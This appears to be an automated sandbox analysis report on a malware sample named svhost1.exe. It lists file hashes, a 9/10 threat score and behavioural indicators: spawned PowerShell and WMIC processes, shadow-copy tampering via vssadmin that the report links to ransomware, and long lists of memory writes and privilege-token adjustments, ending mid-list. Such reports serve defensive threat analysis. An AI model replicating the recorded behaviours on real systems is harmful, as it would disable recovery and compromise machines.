Analysis
-
max time kernel
45s -
max time network
52s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09/05/2020, 18:48
Static task
static1
Behavioral task
behavioral1
Sample
svhost1.exe
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
svhost1.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
svhost1.exe
-
Size
2.8MB
-
MD5
0527539f8c9af38ea8c36e9d2be595cd
-
SHA1
a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
-
SHA256
247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
-
SHA512
00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Score
9/10
Malware Config
Signatures
-
Runs net.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1616 vssadmin.exe -
Suspicious use of WriteProcessMemory 141 IoCs
description pid Process procid_target PID 1100 wrote to memory of 596 1100 svhost1.exe 24 PID 1100 wrote to memory of 596 1100 svhost1.exe 24 PID 1100 wrote to memory of 596 1100 svhost1.exe 24 PID 596 wrote to memory of 660 596 powershell.exe 26 PID 596 wrote to memory of 660 596 powershell.exe 26 PID 596 wrote to memory of 660 596 powershell.exe 26 PID 1100 wrote to memory of 984 1100 svhost1.exe 27 PID 1100 wrote to memory of 984 1100 svhost1.exe 27 PID 1100 wrote to memory of 984 1100 svhost1.exe 27 PID 984 wrote to memory of 1068 984 powershell.exe 29 PID 984 wrote to memory of 1068 984 powershell.exe 29 PID 984 wrote to memory of 1068 984 powershell.exe 29 PID 984 wrote to memory of 1616 984 powershell.exe 33 PID 984 wrote to memory of 1616 984 powershell.exe 33 PID 984 wrote to memory of 1616 984 powershell.exe 33 PID 984 wrote to memory of 1608 984 powershell.exe 34 PID 984 wrote to memory of 1608 984 powershell.exe 34 PID 984 wrote to memory of 1608 984 powershell.exe 34 PID 984 wrote to memory of 1620 984 powershell.exe 35 PID 984 wrote to memory of 1620 984 powershell.exe 35 PID 984 wrote to memory of 1620 984 powershell.exe 35 PID 984 wrote to memory of 1704 984 powershell.exe 36 PID 984 wrote to memory of 1704 984 powershell.exe 36 PID 984 wrote to memory of 1704 984 powershell.exe 36 PID 984 wrote to memory of 1892 984 powershell.exe 37 PID 984 wrote to memory of 1892 984 powershell.exe 37 PID 984 wrote to memory of 1892 984 powershell.exe 37 PID 984 wrote to memory of 1840 984 powershell.exe 38 PID 984 wrote to memory of 1840 984 powershell.exe 38 PID 984 wrote to memory of 1840 984 powershell.exe 38 PID 984 wrote to memory of 1916 984 powershell.exe 39 PID 984 wrote to memory of 1916 984 powershell.exe 39 PID 984 wrote to memory of 1916 984 powershell.exe 39 PID 984 wrote to memory of 1264 984 powershell.exe 40 PID 984 wrote to memory of 1264 984 powershell.exe 40 PID 984 wrote to memory of 1264 984 powershell.exe 40 PID 984 wrote to memory of 540 984 powershell.exe 41 PID 984 wrote to memory of 540 984 powershell.exe 41 PID 984 wrote to memory of 540 984 powershell.exe 41 PID 984 wrote to memory of 2036 984 powershell.exe 42 PID 984 wrote to memory of 2036 984 powershell.exe 42 PID 984 wrote to memory of 2036 984 powershell.exe 42 PID 984 wrote to memory of 2012 984 powershell.exe 43 PID 984 wrote to memory of 2012 984 powershell.exe 43 PID 984 wrote to memory of 2012 984 powershell.exe 43 PID 984 wrote to memory of 1452 984 powershell.exe 44 PID 984 wrote to memory of 1452 984 powershell.exe 44 PID 984 wrote to memory of 1452 984 powershell.exe 44 PID 984 wrote to memory of 1480 984 powershell.exe 45 PID 984 wrote to memory of 1480 984 powershell.exe 45 PID 984 wrote to memory of 1480 984 powershell.exe 45 PID 984 wrote to memory of 1308 984 powershell.exe 46 PID 984 wrote to memory of 1308 984 powershell.exe 46 PID 984 wrote to memory of 1308 984 powershell.exe 46 PID 984 wrote to memory of 276 984 powershell.exe 47 PID 984 wrote to memory of 276 984 powershell.exe 47 PID 984 wrote to memory of 276 984 powershell.exe 47 PID 984 wrote to memory of 432 984 powershell.exe 48 PID 984 wrote to memory of 432 984 powershell.exe 48 PID 984 wrote to memory of 432 984 powershell.exe 48 PID 984 wrote to memory of 216 984 powershell.exe 49 PID 984 wrote to memory of 216 984 powershell.exe 49 PID 984 wrote to memory of 216 984 powershell.exe 49 PID 984 wrote to memory of 1500 984 powershell.exe 50 PID 984 wrote to memory of 1500 984 powershell.exe 50 PID 984 wrote to memory of 1500 984 powershell.exe 50 PID 984 wrote to memory of 1592 984 powershell.exe 51 PID 984 wrote to memory of 1592 984 powershell.exe 51 PID 984 wrote to memory of 1592 984 powershell.exe 51 PID 984 wrote to memory of 1192 984 powershell.exe 52 PID 984 wrote to memory of 1192 984 powershell.exe 52 PID 984 wrote to memory of 1192 984 powershell.exe 52 PID 984 wrote to memory of 1572 984 powershell.exe 53 PID 984 wrote to memory of 1572 984 powershell.exe 53 PID 984 wrote to memory of 1572 984 powershell.exe 53 PID 984 wrote to memory of 1880 984 powershell.exe 54 PID 984 wrote to memory of 1880 984 powershell.exe 54 PID 984 wrote to memory of 1880 984 powershell.exe 54 PID 984 wrote to memory of 1840 984 powershell.exe 55 PID 984 wrote to memory of 1840 984 powershell.exe 55 PID 984 wrote to memory of 1840 984 powershell.exe 55 PID 984 wrote to memory of 1916 984 powershell.exe 56 PID 984 wrote to memory of 1916 984 powershell.exe 56 PID 984 wrote to memory of 1916 984 powershell.exe 56 PID 984 wrote to memory of 1264 984 powershell.exe 57 PID 984 wrote to memory of 1264 984 powershell.exe 57 PID 984 wrote to memory of 1264 984 powershell.exe 57 PID 984 wrote to memory of 540 984 powershell.exe 58 PID 984 wrote to memory of 540 984 powershell.exe 58 PID 984 wrote to memory of 540 984 powershell.exe 58 PID 984 wrote to memory of 2036 984 powershell.exe 59 PID 984 wrote to memory of 2036 984 powershell.exe 59 PID 984 wrote to memory of 2036 984 powershell.exe 59 PID 984 wrote to memory of 2012 984 powershell.exe 60 PID 984 wrote to memory of 2012 984 powershell.exe 60 PID 984 wrote to memory of 2012 984 powershell.exe 60 PID 984 wrote to memory of 1456 984 powershell.exe 61 PID 984 wrote to memory of 1456 984 powershell.exe 61 PID 984 wrote to memory of 1456 984 powershell.exe 61 PID 984 wrote to memory of 596 984 powershell.exe 62 PID 984 wrote to memory of 596 984 powershell.exe 62 PID 984 wrote to memory of 596 984 powershell.exe 62 PID 984 wrote to memory of 528 984 powershell.exe 63 PID 984 wrote to memory of 528 984 powershell.exe 63 PID 984 wrote to memory of 528 984 powershell.exe 63 PID 984 wrote to memory of 204 984 powershell.exe 64 PID 984 wrote to memory of 204 984 powershell.exe 64 PID 984 wrote to memory of 204 984 powershell.exe 64 PID 984 wrote to memory of 1488 984 powershell.exe 65 PID 984 wrote to memory of 1488 984 powershell.exe 65 PID 984 wrote to memory of 1488 984 powershell.exe 65 PID 984 wrote to memory of 1580 984 powershell.exe 66 PID 984 wrote to memory of 1580 984 powershell.exe 66 PID 984 wrote to memory of 1580 984 powershell.exe 66 PID 984 wrote to memory of 1608 984 powershell.exe 67 PID 984 wrote to memory of 1608 984 powershell.exe 67 PID 984 wrote to memory of 1608 984 powershell.exe 67 PID 984 wrote to memory of 1560 984 powershell.exe 68 PID 984 wrote to memory of 1560 984 powershell.exe 68 PID 984 wrote to memory of 1560 984 powershell.exe 68 PID 984 wrote to memory of 1848 984 powershell.exe 69 PID 984 wrote to memory of 1848 984 powershell.exe 69 PID 984 wrote to memory of 1848 984 powershell.exe 69 PID 984 wrote to memory of 1888 984 powershell.exe 70 PID 984 wrote to memory of 1888 984 powershell.exe 70 PID 984 wrote to memory of 1888 984 powershell.exe 70 PID 984 wrote to memory of 1924 984 powershell.exe 71 PID 984 wrote to memory of 1924 984 powershell.exe 71 PID 984 wrote to memory of 1924 984 powershell.exe 71 PID 984 wrote to memory of 1980 984 powershell.exe 72 PID 984 wrote to memory of 1980 984 powershell.exe 72 PID 984 wrote to memory of 1980 984 powershell.exe 72 PID 984 wrote to memory of 576 984 powershell.exe 73 PID 984 wrote to memory of 576 984 powershell.exe 73 PID 984 wrote to memory of 576 984 powershell.exe 73 PID 984 wrote to memory of 2024 984 powershell.exe 74 PID 984 wrote to memory of 2024 984 powershell.exe 74 PID 984 wrote to memory of 2024 984 powershell.exe 74 PID 984 wrote to memory of 1968 984 powershell.exe 75 PID 984 wrote to memory of 1968 984 powershell.exe 75 PID 984 wrote to memory of 1968 984 powershell.exe 75 -
Suspicious use of AdjustPrivilegeToken 1565 IoCs
description pid Process Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 WMIC.exe Token: SeSecurityPrivilege 1068 WMIC.exe Token: SeTakeOwnershipPrivilege 1068 WMIC.exe Token: SeLoadDriverPrivilege 1068 WMIC.exe Token: SeSystemProfilePrivilege 1068 WMIC.exe Token: SeSystemtimePrivilege 1068 WMIC.exe Token: SeProfSingleProcessPrivilege 1068 WMIC.exe Token: SeIncBasePriorityPrivilege 1068 WMIC.exe Token: SeCreatePagefilePrivilege 1068 WMIC.exe Token: SeBackupPrivilege 1068 WMIC.exe Token: SeRestorePrivilege 1068 WMIC.exe Token: SeShutdownPrivilege 1068 WMIC.exe Token: SeDebugPrivilege 1068 WMIC.exe Token: SeSystemEnvironmentPrivilege 1068 WMIC.exe Token: SeRemoteShutdownPrivilege 1068 WMIC.exe Token: SeUndockPrivilege 1068 WMIC.exe Token: SeManageVolumePrivilege 1068 WMIC.exe Token: 33 1068 WMIC.exe Token: 34 1068 WMIC.exe Token: 35 1068 WMIC.exe Token: SeIncreaseQuotaPrivilege 1068 WMIC.exe Token: SeSecurityPrivilege 1068 WMIC.exe Token: SeTakeOwnershipPrivilege 1068 WMIC.exe Token: SeLoadDriverPrivilege 1068 WMIC.exe Token: SeSystemProfilePrivilege 1068 WMIC.exe Token: SeSystemtimePrivilege 1068 WMIC.exe Token: SeProfSingleProcessPrivilege 1068 WMIC.exe Token: SeIncBasePriorityPrivilege 1068 WMIC.exe Token: SeCreatePagefilePrivilege 1068 WMIC.exe Token: SeBackupPrivilege 1068 WMIC.exe Token: SeRestorePrivilege 1068 WMIC.exe Token: SeShutdownPrivilege 1068 WMIC.exe Token: SeDebugPrivilege 1068 WMIC.exe Token: SeSystemEnvironmentPrivilege 1068 WMIC.exe Token: SeRemoteShutdownPrivilege 1068 WMIC.exe Token: SeUndockPrivilege 1068 WMIC.exe Token: SeManageVolumePrivilege 1068 WMIC.exe Token: 33 1068 WMIC.exe Token: 34 1068 WMIC.exe Token: 35 1068 WMIC.exe Token: SeBackupPrivilege 1784 vssvc.exe Token: SeRestorePrivilege 1784 vssvc.exe Token: SeAuditPrivilege 1784 vssvc.exe Token: SeIncreaseQuotaPrivilege 1704 WMIC.exe Token: SeSecurityPrivilege 1704 WMIC.exe Token: SeTakeOwnershipPrivilege 1704 WMIC.exe Token: SeLoadDriverPrivilege 1704 WMIC.exe Token: SeSystemProfilePrivilege 1704 WMIC.exe Token: SeSystemtimePrivilege 1704 WMIC.exe Token: SeProfSingleProcessPrivilege 1704 WMIC.exe Token: SeIncBasePriorityPrivilege 1704 WMIC.exe Token: SeCreatePagefilePrivilege 1704 WMIC.exe Token: SeBackupPrivilege 1704 WMIC.exe Token: SeRestorePrivilege 1704 WMIC.exe Token: SeShutdownPrivilege 1704 WMIC.exe Token: SeDebugPrivilege 1704 WMIC.exe Token: SeSystemEnvironmentPrivilege 1704 WMIC.exe Token: SeRemoteShutdownPrivilege 1704 WMIC.exe Token: SeUndockPrivilege 1704 WMIC.exe Token: SeManageVolumePrivilege 1704 WMIC.exe Token: 33 1704 WMIC.exe Token: 34 1704 WMIC.exe Token: 35 1704 WMIC.exe Token: SeIncreaseQuotaPrivilege 1704 WMIC.exe Token: SeSecurityPrivilege 1704 WMIC.exe Token: SeTakeOwnershipPrivilege 1704 WMIC.exe Token: SeLoadDriverPrivilege 1704 WMIC.exe Token: SeSystemProfilePrivilege 1704 WMIC.exe Token: SeSystemtimePrivilege 1704 WMIC.exe Token: SeProfSingleProcessPrivilege 1704 WMIC.exe Token: SeIncBasePriorityPrivilege 1704 WMIC.exe Token: SeCreatePagefilePrivilege 1704 WMIC.exe Token: SeBackupPrivilege 1704 WMIC.exe Token: SeRestorePrivilege 1704 WMIC.exe Token: SeShutdownPrivilege 1704 WMIC.exe Token: SeDebugPrivilege 1704 WMIC.exe Token: SeSystemEnvironmentPrivilege 1704 WMIC.exe Token: SeRemoteShutdownPrivilege 1704 WMIC.exe Token: SeUndockPrivilege 1704 WMIC.exe Token: SeManageVolumePrivilege 1704 WMIC.exe Token: 33 1704 WMIC.exe Token: 34 1704 WMIC.exe Token: 35 1704 WMIC.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeSecurityPrivilege 1452 WMIC.exe Token: SeTakeOwnershipPrivilege 1452 WMIC.exe Token: SeLoadDriverPrivilege 1452 WMIC.exe Token: SeSystemProfilePrivilege 1452 WMIC.exe Token: SeSystemtimePrivilege 1452 WMIC.exe Token: SeProfSingleProcessPrivilege 1452 WMIC.exe Token: SeIncBasePriorityPrivilege 1452 WMIC.exe Token: SeCreatePagefilePrivilege 1452 WMIC.exe Token: SeBackupPrivilege 1452 WMIC.exe Token: SeRestorePrivilege 1452 WMIC.exe Token: SeShutdownPrivilege 1452 WMIC.exe Token: SeDebugPrivilege 1452 WMIC.exe Token: SeSystemEnvironmentPrivilege 1452 WMIC.exe Token: SeRemoteShutdownPrivilege 1452 WMIC.exe Token: SeUndockPrivilege 1452 WMIC.exe Token: SeManageVolumePrivilege 1452 WMIC.exe Token: 33 1452 WMIC.exe Token: 34 1452 WMIC.exe Token: 35 1452 WMIC.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeSecurityPrivilege 1452 WMIC.exe Token: SeTakeOwnershipPrivilege 1452 WMIC.exe Token: SeLoadDriverPrivilege 1452 WMIC.exe Token: SeSystemProfilePrivilege 1452 WMIC.exe Token: SeSystemtimePrivilege 1452 WMIC.exe Token: SeProfSingleProcessPrivilege 1452 WMIC.exe Token: SeIncBasePriorityPrivilege 1452 WMIC.exe Token: SeCreatePagefilePrivilege 1452 WMIC.exe Token: SeBackupPrivilege 1452 WMIC.exe Token: SeRestorePrivilege 1452 WMIC.exe Token: SeShutdownPrivilege 1452 WMIC.exe Token: SeDebugPrivilege 1452 WMIC.exe Token: SeSystemEnvironmentPrivilege 1452 WMIC.exe Token: SeRemoteShutdownPrivilege 1452 WMIC.exe Token: SeUndockPrivilege 1452 WMIC.exe Token: SeManageVolumePrivilege 1452 WMIC.exe Token: 33 1452 WMIC.exe Token: 34 1452 WMIC.exe Token: 35 1452 WMIC.exe Token: SeIncreaseQuotaPrivilege 1480 WMIC.exe Token: SeSecurityPrivilege 1480 WMIC.exe Token: SeTakeOwnershipPrivilege 1480 WMIC.exe Token: SeLoadDriverPrivilege 1480 WMIC.exe Token: SeSystemProfilePrivilege 1480 WMIC.exe Token: SeSystemtimePrivilege 1480 WMIC.exe Token: SeProfSingleProcessPrivilege 1480 WMIC.exe Token: SeIncBasePriorityPrivilege 1480 WMIC.exe Token: SeCreatePagefilePrivilege 1480 WMIC.exe Token: SeBackupPrivilege 1480 WMIC.exe Token: SeRestorePrivilege 1480 WMIC.exe Token: SeShutdownPrivilege 1480 WMIC.exe Token: SeDebugPrivilege 1480 WMIC.exe Token: SeSystemEnvironmentPrivilege 1480 WMIC.exe Token: SeRemoteShutdownPrivilege 1480 WMIC.exe Token: SeUndockPrivilege 1480 WMIC.exe Token: SeManageVolumePrivilege 1480 WMIC.exe Token: 33 1480 WMIC.exe Token: 34 1480 